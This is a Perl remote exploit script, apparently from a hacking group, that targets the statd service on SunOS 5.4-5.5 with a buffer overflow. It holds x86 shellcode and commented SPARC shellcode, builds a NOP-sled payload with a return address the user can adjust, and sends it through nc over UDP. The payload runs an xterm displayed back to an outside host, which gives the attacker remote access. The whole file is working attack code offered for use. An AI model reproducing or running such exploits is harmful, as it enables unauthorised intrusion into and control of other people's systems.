#!/usr/bin/perl 
# Woodoo H.C. SunOS 5.4-5.5 statd remote exploit.  
# Do not distribute. Just for Woodoo members
# To get offset, trace... (warn: the statd is standalone)
# Edit the $command string before you run. This shellcode 
# not work on all architecture, so if you can, change it to 
# yours target's architecture. (that's not to hard)
# Tested on SunOS 5.5 (suni.bke.hu) - and works fine :)

$sshellcode= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46" .
             "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e" .
             "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" .
             "\x40\xcd\x80\xe8\xdc\xff\xff\xff"; 

# 'nother shellcode in sparc asm... 
#"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
#"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
#"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
#"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
#"\x91\xd0\x20\x08"

$command = "/usr/openwin/bin/xterm -display crow.penguinpowered.com:0.0";
$buffsize=1024;
$bufofs="0x80fb43a0";
$NOP = "\x90";

$buffer = $NOP x 750;
$buffer .= $sshellcode;
$buffer .= $command;

if ( 2 > (push @ARGV) or $ARGV[1] !~ /^\d+$/) {
    print "Usage: ./wstatd.pl host port [offset]\n\n";
    exit(0);
}

$thost = $ARGV[0];
$tport = $ARGV[1];
$userofs = $ARGV[2] if ($ARGV[2]);

$ofs = (hex $bufofs ) + $userofs;
$kewlofs = pack("N", $ofs);
          
while (length $buffer < $buffsize) {
    $buffer .= $kewlofs;
}

$buffer .= "\n\n";

open(SPTMP, ">/tmp/statd-$$.spl");
        print SPTMP $buffer;
close SPTMP;
        
        print "\nConnect to $thost : $tport offset: ";
        printf("%x\n\n" , $kewlofs);
        
system("\( cat /tmp/statd-$$.spl \) \| nc -v -u $thost $tport");
system("rm /tmp/statd-$$.spl");

exit();